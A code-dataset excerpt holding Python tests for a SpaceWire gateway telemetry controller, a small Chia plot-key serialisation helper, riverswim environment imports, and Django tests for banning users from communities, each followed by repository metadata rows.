for parameter_info in dummy_test_class.func_1_last_value
])
expected_params_info = str([
str(parameter_info) for parameter_info in get_provider_params_info(
custom_component_config, custom_service_info)
])
assert received_params_info == expected_params_info
def test_io_service_request_observer(self):
""" Test component io_service_request observer """
# Start Mock
mock = H8823GatewayTmTcMock(self.context)
mock.initialize()
# Start Test
component = H8823TmTcController(self.context)
component.initialize()
dummy_test_class = CallbackTestClass()
# Subscribe to the topic that shall be published
self.context.rx['io_result'].pipe(
op.filter(lambda value: value.type != ParameterType.set and value.
type != ParameterType.error)).subscribe(
dummy_test_class.test_func_1)
self.context.rx['io_result'].pipe(
op.filter(lambda value: value.type == ParameterType.set or value.
type == ParameterType.error)).subscribe(
dummy_test_class.test_func_2)
# 1 - Test that component only gets activated for implemented services
self.context.rx['io_service_request'].on_next(
ServiceRequest(
provider='hvs_h8823_spacewire_ethernet_gateway_tmtc',
id='NOT_EXISTING',
type='any',
args=[]))
assert dummy_test_class.func_1_times_called == 0
assert dummy_test_class.func_1_last_value is None
self.context.rx['io_service_request'].on_next(
ServiceRequest(provider='NOT_EXISTING',
id='connect',
type='any',
args=[]))
assert dummy_test_class.func_1_times_called == 0
assert dummy_test_class.func_1_last_value is None
# 2 - Test generic command before connection to the instrument has been established
self.context.rx['io_service_request'].on_next(
ServiceRequest(
provider='hvs_h8823_spacewire_ethernet_gateway_tmtc',
id='spw_link_autostart',
type=ParameterType.get,
args=[]))
time.sleep(.1)
assert dummy_test_class.func_1_times_called == 1
assert dummy_test_class.func_1_last_value.id == 'spw_link_autostart'
assert dummy_test_class.func_1_last_value.type == ParameterType.get
assert dummy_test_class.func_1_last_value.value == '0 0 0 0'
# 3 - Test connection to the instrument
assert component._inst is None
self.context.rx['io_service_request'].on_next(
ServiceRequest(
provider='hvs_h8823_spacewire_ethernet_gateway_tmtc',
id='connect',
type=ParameterType.set,
args=['1']))
time.sleep(.1)
assert component._inst is not None
assert dummy_test_class.func_2_times_called == 1
assert dummy_test_class.func_2_last_value.id == 'connect'
assert dummy_test_class.func_2_last_value.type == ParameterType.set
assert dummy_test_class.func_2_last_value.value is None
assert component._inst_cyclic_tm is not None
assert component._inst_cyclic_tm_thread is not None
assert dummy_test_class.func_1_times_called == 21
assert dummy_test_class.func_1_last_value.id == 'ticks_received_counter'
assert dummy_test_class.func_1_last_value.type == ParameterType.get
assert dummy_test_class.func_1_last_value.value == '0 0 0 0'
# 4 - Test generic command with wrong number of parameters
self.context.rx['io_service_request'].on_next(
ServiceRequest(
provider='hvs_h8823_spacewire_ethernet_gateway_tmtc',
id='spw_link_reset',
type=ParameterType.set,
args=[]))
time.sleep(.1)
assert dummy_test_class.func_2_times_called == 2
assert dummy_test_class.func_2_last_value.id == 'spw_link_reset'
assert dummy_test_class.func_2_last_value.type == ParameterType.error
assert dummy_test_class.func_2_last_value.value == "Wrong number or arguments for spw_link_reset.\n Expected: [{'port': {'type': 'int', 'range': [0, 3]}}];\n Received: []"
# 5 - Test generic command
self.context.rx['io_service_request'].on_next(
ServiceRequest(
provider='hvs_h8823_spacewire_ethernet_gateway_tmtc',
id='spw_link_reset',
type=ParameterType.set,
args=['0']))
time.sleep(.1)
assert dummy_test_class.func_2_times_called == 3
assert dummy_test_class.func_2_last_value.id == 'spw_link_reset'
assert dummy_test_class.func_2_last_value.type == ParameterType.set
assert dummy_test_class.func_2_last_value.value is None
# 6 - Test generic query
self.context.rx['io_service_request'].on_next(
ServiceRequest(
provider='hvs_h8823_spacewire_ethernet_gateway_tmtc',
id='spw_link_enabled',
type=ParameterType.get,
args=[]))
time.sleep(.1)
assert dummy_test_class.func_1_times_called == 22
assert dummy_test_class.func_1_last_value.id == 'spw_link_enabled'
assert dummy_test_class.func_1_last_value.type == ParameterType.get
assert dummy_test_class.func_1_last_value.value == '0 0 0 0'
# 7 - Test shared memory set
assert component._shared_memory == {
'bytes_received_counter': '0 0 0 0',
'connected': 1,
'credit_error_counter': '0 0 0 0',
'disconnect_error_counter': '0 0 0 0',
'eep_received_counter': '0 0 0 0',
'eep_sent_counter': '0 0 0 0',
'eop_received_counter': '0 0 0 0',
'eop_sent_counter': '0 0 0 0',
'escape_error_counter': '0 0 0 0',
'parity_error_counter': '0 0 0 0',
'spw_link_autostart': '0 0 0 0',
'spw_link_bytes_sent_counter': '0 0 0 0',
'spw_link_enabled': '0 0 0 0',
'spw_link_running': '0 0 0 0',
'spw_link_rx_rate': '0 0 0 0',
'spw_link_start': '0 0 0 0',
'spw_link_status': '0 0 0 0',
'spw_link_tcp_connected': '0 0 0 0',
'spw_link_timecode_enabled': '0 0 0 0',
'spw_link_tx_rate': '0 0 0 0',
'ticks_received_counter': '0 0 0 0'
}
self.context.rx['io_service_request'].on_next(
ServiceRequest(
provider='hvs_h8823_spacewire_ethernet_gateway_tmtc',
id='spw_link_tx_rate',
type=ParameterType.set,
args=['0', '10']))
time.sleep(.1)
assert component._shared_memory == {
'bytes_received_counter': '0 0 0 0',
'connected': 1,
'credit_error_counter': '0 0 0 0',
'disconnect_error_counter': '0 0 0 0',
'eep_received_counter': '0 0 0 0',
'eep_sent_counter': '0 0 0 0',
'eop_received_counter': '0 0 0 0',
'eop_sent_counter': '0 0 0 0',
'escape_error_counter': '0 0 0 0',
'parity_error_counter': '0 0 0 0',
'spw_link_autostart': '0 0 0 0',
'spw_link_bytes_sent_counter': '0 0 0 0',
'spw_link_enabled': '0 0 0 0',
'spw_link_running': '0 0 0 0',
'spw_link_rx_rate': '0 0 0 0',
'spw_link_start': '0 0 0 0',
'spw_link_status': '0 0 0 0',
'spw_link_tcp_connected': '0 0 0 0',
'spw_link_timecode_enabled': '0 0 0 0',
'spw_link_tx_rate': '0 0 0 0',
'ticks_received_counter': '0 0 0 0'
}
assert dummy_test_class.func_2_times_called == 4
assert dummy_test_class.func_2_last_value.id == 'spw_link_tx_rate'
assert dummy_test_class.func_2_last_value.type == ParameterType.set
assert dummy_test_class.func_2_last_value.value is None
time.sleep(4.6)
assert component._shared_memory == {
'bytes_received_counter': '0 0 0 0',
'connected': 1,
'credit_error_counter': '0 0 0 0',
'disconnect_error_counter': '0 0 0 0',
'eep_received_counter': '0 0 0 0',
'eep_sent_counter': '0 0 0 0',
'eop_received_counter': '0 0 0 0',
'eop_sent_counter': '0 0 0 0',
'escape_error_counter': '0 0 0 0',
'parity_error_counter': '0 0 0 0',
'spw_link_autostart': '0 0 0 0',
'spw_link_bytes_sent_counter': '0 0 0 0',
'spw_link_enabled': '0 0 0 0',
'spw_link_running': '0 0 0 0',
'spw_link_rx_rate': '0 0 0 0',
'spw_link_start': '0 0 0 0',
'spw_link_status': '0 0 0 0',
'spw_link_tcp_connected': '0 0 0 0',
'spw_link_timecode_enabled': '0 0 0 0',
'spw_link_tx_rate': '10 0 0 0',
'ticks_received_counter': '0 0 0 0'
}
# 8 - Test shared memory get
assert dummy_test_class.func_1_times_called == 42
self.context.rx['io_service_request'].on_next(
ServiceRequest(
provider='hvs_h8823_spacewire_ethernet_gateway_tmtc',
id='spw_link_tx_rate',
type=ParameterType.get,
args=[]))
time.sleep(.1)
assert dummy_test_class.func_1_times_called == 43
assert dummy_test_class.func_1_last_value.id == 'spw_link_tx_rate'
assert dummy_test_class.func_1_last_value.type == ParameterType.get
assert dummy_test_class.func_1_last_value.value == '10 0 0 0'
# 9 - Test disconnection to the instrument
self.context.rx['io_service_request'].on_next(
ServiceRequest(
provider='hvs_h8823_spacewire_ethernet_gateway_tmtc',
id='connect',
type=ParameterType.set,
args=['0']))
time.sleep(.1)
assert component._inst is None
assert dummy_test_class.func_2_times_called == 5
assert dummy_test_class.func_2_last_value.id == 'connect'
assert dummy_test_class.func_2_last_value.type == ParameterType.set
assert dummy_test_class.func_2_last_value.value is None
self.context.rx['io_service_request'].on_next(
ServiceRequest(
provider='hvs_h8823_spacewire_ethernet_gateway_tmtc',
id='connected',
type=ParameterType.get,
args=[]))
time.sleep(.1)
assert component._inst is None
assert dummy_test_class.func_1_times_called == 44
assert dummy_test_class.func_1_last_value.id == 'connected'
assert dummy_test_class.func_1_last_value.type == ParameterType.get
assert dummy_test_class.func_1_last_value.value == 0
self.context.rx['quit'].on_next(Empty())
time.sleep(1)
def test_connection_wrong_instrument_address(self):
dummy_test_class = CallbackTestClass()
# Subscribe to the topic that shall be published
self.context.rx['io_result'].pipe(
op.filter(
lambda value: isinstance(value, ServiceResponse))).subscribe(
dummy_test_class.test_func_1)
# Test simulated normal connection to the instrument
component = H8823TmTcController(
self.context,
local_config={'instrument': {
'port': {
'tc': 1000,
'tm': 1001
}
}})
component.initialize()
assert component._inst is None
self.context.rx['io_service_request'].on_next(
ServiceRequest(
provider='hvs_h8823_spacewire_ethernet_gateway_tmtc',
id='connect',
type=ParameterType.set,
args=['1']))
time.sleep(1)
assert dummy_test_class.func_1_times_called == 1
assert dummy_test_class.func_1_last_value.id == 'connect'
assert dummy_test_class.func_1_last_value.type == ParameterType.error
assert dummy_test_class.func_1_last_value.value == 'Instrument is unreachable'
def test_disconnection_w_no_connection(self):
dummy_test_class = CallbackTestClass()
# Subscribe to the topic that shall be published
self.context.rx['io_result'].pipe(
op.filter(
lambda value: isinstance(value, ServiceResponse))).subscribe(
dummy_test_class.test_func_1)
# Test real connection to missing instrument
component = H8823TmTcController(self.context)
component.initialize()
assert component._inst is None
self.context.rx['io_service_request'].on_next(
ServiceRequest(
provider='hvs_h8823_spacewire_ethernet_gateway_tmtc',
id='connect',
type=ParameterType.set,
args=['0']))
time.sleep(.1)
assert component._inst is None
assert dummy_test_class.func_1_times_called == 1
assert dummy_test_class.func_1_last_value.id == 'connect'
assert dummy_test_class.func_1_last_value.type == ParameterType.set
assert dummy_test_class.func_1_last_value.value is None
def test_multi_command_multi_input_parameter(self):
# Start Mock
mock = H8823GatewayTmTcMock(
self.context,
local_config={'instrument': {
'port': {
'tc': 6300,
'tm': 6301
}
}})
mock.initialize()
dummy_test_class = CallbackTestClass()
# Subscribe to the topic that shall be published
self.context.rx['io_result'].pipe(
op.filter(lambda value: value.type != ParameterType.set and value.
type != ParameterType.error)).subscribe(
dummy_test_class.test_func_1)
self.context.rx['io_result'].pipe(
op.filter(lambda value: value.type == ParameterType.set or value.
type == ParameterType.error)).subscribe(
dummy_test_class.test_func_2)
component = H8823TmTcController(
self.context,
local_config={
'instrument': {
'port': {
'tc': 6300,
'tm': 6301
}
},
'parameters': {
'new_param': {
'description': 'New parameter description',
'set': {
'signature': [{
'status': {
'type': 'str'
}
}, {
'port': {
'type': 'int'
}
}],
'instrument_command': [{
'write':
'SPWG_TC_SPW_LINK_AUTO_{0}_{1}'
}, {
'write':
'SPWG_TC_SPW_LINK_{0}_{1}'
}]
}
}
}
})
component.initialize()
# Connect to instrument and check initial status
self.context.rx['io_service_request'].on_next(
ServiceRequest(
provider='hvs_h8823_spacewire_ethernet_gateway_tmtc',
id='connect',
type=ParameterType.set,
args=['1']))
time.sleep(.1)
assert component._shared_memory == {
'bytes_received_counter': '0 0 0 0',
'connected': 1,
'credit_error_counter': '0 0 0 0',
'disconnect_error_counter': '0 0 0 0',
'eep_received_counter': '0 0 0 0',
'eep_sent_counter': '0 0 0 0',
'eop_received_counter': '0 0 0 0',
'eop_sent_counter': '0 0 0 0',
'escape_error_counter': '0 0 0 0',
'parity_error_counter': '0 0 0 0',
'spw_link_autostart': '0 0 0 0',
'spw_link_bytes_sent_counter': '0 0 0 0',
'spw_link_enabled': '0 0 0 0',
'spw_link_running': '0 0 0 0',
'spw_link_rx_rate': '0 0 0 0',
'spw_link_start': '0 0 0 0',
'spw_link_status': '0 0 0 0',
'spw_link_tcp_connected': '0 0 0 0',
'spw_link_timecode_enabled': '0 0 0 0',
'spw_link_tx_rate': '0 0 0 0',
'ticks_received_counter': '0 0 0 0'
}
assert component._inst_cyclic_tm is not None
assert component._inst_cyclic_tm_thread is not None
assert dummy_test_class.func_2_times_called == 1
assert dummy_test_class.func_2_last_value.id == 'connect'
assert dummy_test_class.func_2_last_value.type == ParameterType.set
assert dummy_test_class.func_2_last_value.value is None
# Call new parameter
self.context.rx['io_service_request'].on_next(
ServiceRequest(
provider='hvs_h8823_spacewire_ethernet_gateway_tmtc',
id='new_param',
type=ParameterType.set,
args=['ENA', '1']))
time.sleep(.1)
assert component._shared_memory == {
'bytes_received_counter': '0 0 0 0',
'connected': 1,
'credit_error_counter': '0 0 0 0',
'disconnect_error_counter': '0 0 0 0',
'eep_received_counter': '0 0 0 0',
'eep_sent_counter': '0 0 0 0',
'eop_received_counter': '0 0 0 0',
'eop_sent_counter': '0 0 0 0',
'escape_error_counter': '0 0 0 0',
'parity_error_counter': '0 0 0 0',
'spw_link_autostart': '0 0 0 0',
'spw_link_bytes_sent_counter': '0 0 0 0',
'spw_link_enabled': '0 0 0 0',
'spw_link_running': '0 0 0 0',
'spw_link_rx_rate': '0 0 0 0',
'spw_link_start': '0 0 0 0',
'spw_link_status': '0 0 0 0',
'spw_link_tcp_connected': '0 0 0 0',
'spw_link_timecode_enabled': '0 0 0 0',
'spw_link_tx_rate': '0 0 0 0',
'ticks_received_counter': '0 0 0 0'
}
assert dummy_test_class.func_2_times_called == 2
assert dummy_test_class.func_2_last_value.id == 'new_param'
assert dummy_test_class.func_2_last_value.type == ParameterType.set
assert dummy_test_class.func_2_last_value.value is None
time.sleep(5)
assert component._shared_memory == {
'bytes_received_counter': '0 0 0 0',
'connected': 1,
'credit_error_counter': '0 0 0 0',
'disconnect_error_counter': '0 0 0 0',
'eep_received_counter': '0 0 0 0',
'eep_sent_counter': '0 0 0 0',
'eop_received_counter': '0 0 0 0',
'eop_sent_counter': '0 0 0 0',
'escape_error_counter': '0 0 0 0',
'parity_error_counter': '0 0 0 0',
'spw_link_autostart': '0 1 0 0',
'spw_link_bytes_sent_counter': '0 0 0 0',
'spw_link_enabled': '0 1 0 0',
'spw_link_running': '0 0 0 0',
'spw_link_rx_rate': '0 0 0 0',
'spw_link_start': '0 0 0 0',
'spw_link_status': '0 0 0 0',
'spw_link_tcp_connected': '0 0 0 0',
'spw_link_timecode_enabled': '0 0 0 0',
'spw_link_tx_rate': '0 0 0 0',
'ticks_received_counter': '0 0 0 0'
}
self.context.rx['quit'].on_next(Empty())
time.sleep(1)
def test_service_invalid_info(self):
with pytest.raises(ComponentConfigException) as excinfo:
H8823TmTcController(self.context,
local_config={
'parameters': {
'new_param': {
'type': 'str',
'description':
'New parameter description',
'set': {
'signature':
'wrong',
'instrument_command': [{
'write':
'{:}'
}]
},
}
}
}).initialize()
assert '"new_param" is invalid. Format shall' \
' be [[arg_1, arg_2, ...], return_type]' in str(excinfo.value)
with pytest.raises(ComponentConfigException) as excinfo:
H8823TmTcController(self.context,
local_config={
'parameters': {
'new_param': {
'type': 'str',
'description':
'New parameter description',
'get': {
'signature': [{
'arg': {
'type': 'str'
}
}],
'instrument_command': [{
'write':
'{:}'
}]
},
}
}
}).initialize()
assert '"new_param" Signature for GET is still not allowed' in str(
excinfo.value)
with pytest.raises(ComponentConfigException) as excinfo:
H8823TmTcController(self.context,
local_config={
'parameters': {
'new_param': {
'type': 'str',
'description':
'New parameter description',
'get': {
'instrument_command': [{
'write':
'{:}'
}]
},
}
}
}).initialize()
assert '"new_param" Command for GET does not have a Query' in str(
excinfo.value)
def test_half_tm_received(self):
mock = H8823GatewayTmTcMock(self.context,
local_config={
'instrument': {
'port': {
'tc': 45678,
'tm': 45679
}
},
'half_tm': 1
})
mock.initialize()
component = H8823TmTcController(
self.context,
local_config={'instrument': {
'port': {
'tc': 45678,
'tm': 45679
}
}})
component.initialize()
# Connect to instrument and check initial status
self.context.rx['io_service_request'].on_next(
ServiceRequest(
provider='hvs_h8823_spacewire_ethernet_gateway_tmtc',
id='connect',
type=ParameterType.set,
args=['1']))
time.sleep(1.1)
assert component._shared_memory == {
'bytes_received_counter': '0 0 0 0',
'connected': 1,
'credit_error_counter': '0 0 0 0',
'disconnect_error_counter': '0 0 0 0',
'eep_received_counter': '0 0 0 0',
'eep_sent_counter': '0 0 0 0',
'eop_received_counter': '0 0 0 0',
'eop_sent_counter': '4 3 2 1',
'escape_error_counter': '0 0 0 0',
'parity_error_counter': '0 0 0 0',
'spw_link_autostart': '0 0 0 0',
'spw_link_bytes_sent_counter': '0 0 0 0',
'spw_link_enabled': '0 0 0 0',
'spw_link_running': '0 0 0 0',
'spw_link_rx_rate': '0 0 0 0',
'spw_link_start': '0 0 0 0',
'spw_link_status': '0 0 0 0',
'spw_link_tcp_connected': '0 0 0 0',
'spw_link_timecode_enabled': '0 0 0 0',
'spw_link_tx_rate': '0 0 0 0',
'ticks_received_counter': '0 0 0 0'
}
time.sleep(2)
assert component._shared_memory == {
'bytes_received_counter': '0 0 0 0',
'connected': 1,
'credit_error_counter': '0 0 0 0',
'disconnect_error_counter': '0 0 0 0',
'eep_received_counter': '0 0 0 0',
'eep_sent_counter': '0 1 2 3',
'eop_received_counter': '0 0 0 0',
'eop_sent_counter': '4 3 2 1',
'escape_error_counter': '0 0 0 0',
'parity_error_counter': '0 0 0 0',
'spw_link_autostart': '0 0 0 0',
'spw_link_bytes_sent_counter': '0 0 0 0',
'spw_link_enabled': '0 0 0 0',
'spw_link_running': '0 0 0 0',
'spw_link_rx_rate': '0 0 0 0',
'spw_link_start': '0 0 0 0',
'spw_link_status': '0 0 0 0',
'spw_link_tcp_connected': '0 0 0 0',
'spw_link_timecode_enabled': '0 0 0 0',
'spw_link_tx_rate': '0 0 0 0',
'ticks_received_counter': '6 7 8 9'
}
self.context.rx['quit'].on_next(Empty())
time.sleep(1)
def test_quit_observer(self):
""" Test component quit observer """
class Test:
called = False
def close(self):
self.called = True
component = H8823TmTcController(self.context)
component.initialize()
# Test quit while on load window
component._inst = Test()
assert not component._inst.called
self.context.rx['quit'].on_next(Empty())
# Test connection to the instrument has been closed
assert component._inst is None
| 41.6884 | 179 | 0.537677 | 5,401 | 49,234 | 4.522866 | 0.051842 | 0.054036 | 0.053791 | 0.035697 | 0.884313 | 0.868307 | 0.851768 | 0.830768 | 0.814434 | 0.790118 | 0 | 0.042437 | 0.365357 | 49,234 | 1,180 | 180 | 41.723729 | 0.739359 | 0.038774 | 0 | 0.797571 | 0 | 0.001012 | 0.296497 | 0.090474 | 0 | 0 | 0 | 0 | 0.137652 | 1 | 0.018219 | false | 0.001012 | 0.012146 | 0 | 0.032389 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
0f4af0f00caa8cddb65ac126df2a9c935e6f7f58 | 894 | py | Python | src/plot_tools.py | ChiaCatPool/ChiaSignature | 114cce3b1e811183c85ef745e21f564b9a6e718c | [
"MIT"
] | 2 | 2021-05-27T09:36:54.000Z | 2021-10-12T08:03:08.000Z | src/plot_tools.py | Pow-Duck/ChiaSignature | 114cce3b1e811183c85ef745e21f564b9a6e718c | [
"MIT"
] | null | null | null | src/plot_tools.py | Pow-Duck/ChiaSignature | 114cce3b1e811183c85ef745e21f564b9a6e718c | [
"MIT"
] | null | null | null | from blspy import G1Element, PrivateKey
def stream_plot_info_pk(
pool_public_key: G1Element,
farmer_public_key: G1Element,
local_master_sk: PrivateKey,
):
# There are two ways to stream plot info: with a pool public key, or with a pool contract puzzle hash.
# This one streams the public key, into bytes
data = bytes(pool_public_key) + bytes(farmer_public_key) + bytes(local_master_sk)
assert len(data) == (48 + 48 + 32)
return data
def stream_plot_info_pk(
pool_public_key: G1Element,
farmer_public_key: G1Element,
local_master_sk: PrivateKey,
):
# There are two ways to stream plot info: with a pool public key, or with a pool contract puzzle hash.
# This one streams the public key, into bytes
data = bytes(pool_public_key) + bytes(farmer_public_key) + bytes(local_master_sk)
assert len(data) == (48 + 48 + 32)
return data
| 34.384615 | 106 | 0.720358 | 137 | 894 | 4.481752 | 0.291971 | 0.175896 | 0.127036 | 0.055375 | 0.944625 | 0.944625 | 0.944625 | 0.944625 | 0.944625 | 0.944625 | 0 | 0.023977 | 0.206935 | 894 | 25 | 107 | 35.76 | 0.842031 | 0.323266 | 0 | 0.941176 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.117647 | 1 | 0.117647 | false | 0 | 0.058824 | 0 | 0.294118 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
0f56898011f165f656de0aa729f5d7e91799ec39 | 244 | py | Python | riverswim_variants/envs/__init__.py | RevanMacQueen/Riverswim-Variants | a3593c6b2960185e1815b79aba5a2ccdb6ff9ea7 | [
"MIT"
] | null | null | null | riverswim_variants/envs/__init__.py | RevanMacQueen/Riverswim-Variants | a3593c6b2960185e1815b79aba5a2ccdb6ff9ea7 | [
"MIT"
] | null | null | null | riverswim_variants/envs/__init__.py | RevanMacQueen/Riverswim-Variants | a3593c6b2960185e1815b79aba5a2ccdb6ff9ea7 | [
"MIT"
] | 1 | 2022-03-08T05:29:00.000Z | 2022-03-08T05:29:00.000Z | from riverswim_variants.envs.scaled_riverswim import ScaledRiverSwimEnv
from riverswim_variants.envs.stochastic_riverswim import StochasticRiverSwimEnv
from riverswim_variants.envs.skewed_stochastic_riverswim import SkewedStochasticRiverSwimEnv | 81.333333 | 92 | 0.930328 | 25 | 244 | 8.8 | 0.44 | 0.177273 | 0.286364 | 0.340909 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.045082 | 244 | 3 | 92 | 81.333333 | 0.944206 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
0f59b659ef56550f26f9a02ece0c3165f39f1eb4 | 24,949 | py | Python | openbook_communities/tests/views/community/banned_users/test_views.py | TamaraAbells/okuna-api | f87d8e80d2f182c01dbce68155ded0078ee707e4 | [
"MIT"
] | 164 | 2019-07-29T17:59:06.000Z | 2022-03-19T21:36:01.000Z | openbook_communities/tests/views/community/banned_users/test_views.py | TamaraAbells/okuna-api | f87d8e80d2f182c01dbce68155ded0078ee707e4 | [
"MIT"
] | 188 | 2019-03-16T09:53:25.000Z | 2019-07-25T14:57:24.000Z | openbook_communities/tests/views/community/banned_users/test_views.py | TamaraAbells/okuna-api | f87d8e80d2f182c01dbce68155ded0078ee707e4 | [
"MIT"
] | 80 | 2019-08-03T17:49:08.000Z | 2022-02-28T16:56:33.000Z | import random
from django.urls import reverse
from faker import Faker
from rest_framework import status
from openbook_common.tests.models import OpenbookAPITestCase
import logging
import json
from openbook_common.tests.helpers import make_user, make_authentication_headers_for_user, \
make_community
logger = logging.getLogger(__name__)
fake = Faker()
class Communitybanned_usersAPITest(OpenbookAPITestCase):
def test_cannot_retrieve_banned_users_of_private_community(self):
"""
should not be able to retrieve the banned users of a private community and return 400
"""
user = make_user()
headers = make_authentication_headers_for_user(user)
other_user = make_user()
community = make_community(creator=other_user, type='T')
community_name = community.name
user_to_ban = make_user()
other_user.ban_user_with_username_from_community_with_name(username=user_to_ban.username,
community_name=community_name)
url = self._get_url(community_name=community.name)
response = self.client.get(url, **headers)
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
def test_cannot_retrieve_banned_users_of_public_community(self):
"""
should not be able to retrieve the banned users of a public community and return 400
:return:
"""
user = make_user()
headers = make_authentication_headers_for_user(user)
other_user = make_user()
community = make_community(creator=other_user, type='P')
community_name = community.name
user_to_ban = make_user()
other_user.ban_user_with_username_from_community_with_name(username=user_to_ban.username,
community_name=community_name)
url = self._get_url(community_name=community.name)
response = self.client.get(url, **headers)
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
def test_cannot_retrieve_banned_users_of_community_member_of(self):
"""
should not be able to retrieve the banned users of a community member of and return 400
:return:
"""
user = make_user()
headers = make_authentication_headers_for_user(user)
other_user = make_user()
community = make_community(creator=other_user, type='P')
community_name = community.name
user.join_community_with_name(community_name)
user_to_ban = make_user()
other_user.ban_user_with_username_from_community_with_name(username=user_to_ban.username,
community_name=community_name)
url = self._get_url(community_name=community.name)
response = self.client.get(url, **headers)
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
def test_can_retrieve_banned_users_of_community_if_admin(self):
"""
should be able to retrieve the banned users of a community if is an admin and return 200
:return:
"""
user = make_user()
headers = make_authentication_headers_for_user(user)
other_user = make_user()
community = make_community(creator=other_user)
community_name = community.name
user.join_community_with_name(community_name)
other_user.add_administrator_with_username_to_community_with_name(username=user.username,
community_name=community.name)
amount_of_banned_users = 5
banned_users_ids = []
for i in range(0, amount_of_banned_users):
community_member = make_user()
other_user.ban_user_with_username_from_community_with_name(username=community_member.username,
community_name=community_name)
banned_users_ids.append(community_member.pk)
url = self._get_url(community_name=community.name)
response = self.client.get(url, **headers)
self.assertEqual(response.status_code, status.HTTP_200_OK)
response_banned_users = json.loads(response.content)
self.assertEqual(len(response_banned_users), len(banned_users_ids))
for response_banned_user in response_banned_users:
response_member_id = response_banned_user.get('id')
self.assertIn(response_member_id, banned_users_ids)
def test_can_retrieve_banned_users_of_community_if_mod(self):
"""
should be able to retrieve the banned users of a community if is a moderator and return 200
:return:
"""
user = make_user()
headers = make_authentication_headers_for_user(user)
other_user = make_user()
community = make_community(creator=other_user)
community_name = community.name
user.join_community_with_name(community_name)
other_user.add_moderator_with_username_to_community_with_name(username=user.username,
community_name=community.name)
amount_of_banned_users = 5
banned_users_ids = []
for i in range(0, amount_of_banned_users):
community_member = make_user()
other_user.ban_user_with_username_from_community_with_name(username=community_member.username,
community_name=community_name)
banned_users_ids.append(community_member.pk)
url = self._get_url(community_name=community.name)
response = self.client.get(url, **headers)
self.assertEqual(response.status_code, status.HTTP_200_OK)
response_banned_users = json.loads(response.content)
self.assertEqual(len(response_banned_users), len(banned_users_ids))
for response_banned_user in response_banned_users:
response_member_id = response_banned_user.get('id')
self.assertIn(response_member_id, banned_users_ids)
def _get_url(self, community_name):
return reverse('community-banned-users', kwargs={
'community_name': community_name
})
class BanCommunityUserAPITest(OpenbookAPITestCase):
def test_can_ban_user_from_community_if_mod(self):
"""
should be able to ban user from a community if is moderator and return 200
"""
user = make_user()
headers = make_authentication_headers_for_user(user)
other_user = make_user()
community = make_community(creator=other_user, type='P')
community_name = community.name
user.join_community_with_name(community_name)
other_user.add_moderator_with_username_to_community_with_name(username=user.username,
community_name=community.name)
user_to_ban = make_user()
url = self._get_url(community_name=community.name)
response = self.client.post(url, {
'username': user_to_ban.username
}, **headers)
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertTrue(user_to_ban.is_banned_from_community_with_name(community.name))
def test_logs_user_banned(self):
"""
should create a log when a community user is banned
"""
user = make_user()
headers = make_authentication_headers_for_user(user)
other_user = make_user()
community = make_community(creator=other_user, type='P')
community_name = community.name
user.join_community_with_name(community_name)
other_user.add_moderator_with_username_to_community_with_name(username=user.username,
community_name=community.name)
user_to_ban = make_user()
url = self._get_url(community_name=community.name)
self.client.post(url, {
'username': user_to_ban.username
}, **headers)
self.assertTrue(community.logs.filter(action_type='B',
source_user=user,
target_user=user_to_ban).exists())
def test_cant_ban_user_from_community_if_already_banned(self):
"""
should not be able to ban user from a community if is already banned and return 400
"""
user = make_user()
headers = make_authentication_headers_for_user(user)
community = make_community(creator=user, type='P')
community_name = community.name
user_to_ban = make_user()
user.ban_user_with_username_from_community_with_name(username=user_to_ban.username,
community_name=community_name)
url = self._get_url(community_name=community.name)
response = self.client.post(url, **headers)
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
self.assertTrue(user_to_ban.is_banned_from_community_with_name(community.name))
def test_can_ban_user_from_community_if_admin(self):
"""
should be able to ban user from a community if is admin and return 200
"""
user = make_user()
headers = make_authentication_headers_for_user(user)
other_user = make_user()
community = make_community(creator=other_user, type='P')
community_name = community.name
user.join_community_with_name(community_name)
other_user.add_administrator_with_username_to_community_with_name(username=user.username,
community_name=community.name)
user_to_ban = make_user()
url = self._get_url(community_name=community.name)
response = self.client.post(url, {
'username': user_to_ban.username
}, **headers)
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertTrue(user_to_ban.is_banned_from_community_with_name(community.name))
def test_cant_ban_user_from_community_if_member(self):
"""
should not be able to ban user from a community if is member and return 200
"""
user = make_user()
headers = make_authentication_headers_for_user(user)
other_user = make_user()
community = make_community(creator=other_user, type='P')
community_name = community.name
user.join_community_with_name(community_name)
user_to_ban = make_user()
url = self._get_url(community_name=community.name)
response = self.client.post(url, {
'username': user_to_ban.username
}, **headers)
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
self.assertFalse(user_to_ban.is_banned_from_community_with_name(community.name))
def test_cant_ban_user_from_community(self):
"""
should not be able to ban user from a community and return 200
"""
user = make_user()
headers = make_authentication_headers_for_user(user)
other_user = make_user()
community = make_community(creator=other_user, type='P')
user_to_ban = make_user()
url = self._get_url(community_name=community.name)
response = self.client.post(url, {
'username': user_to_ban.username
}, **headers)
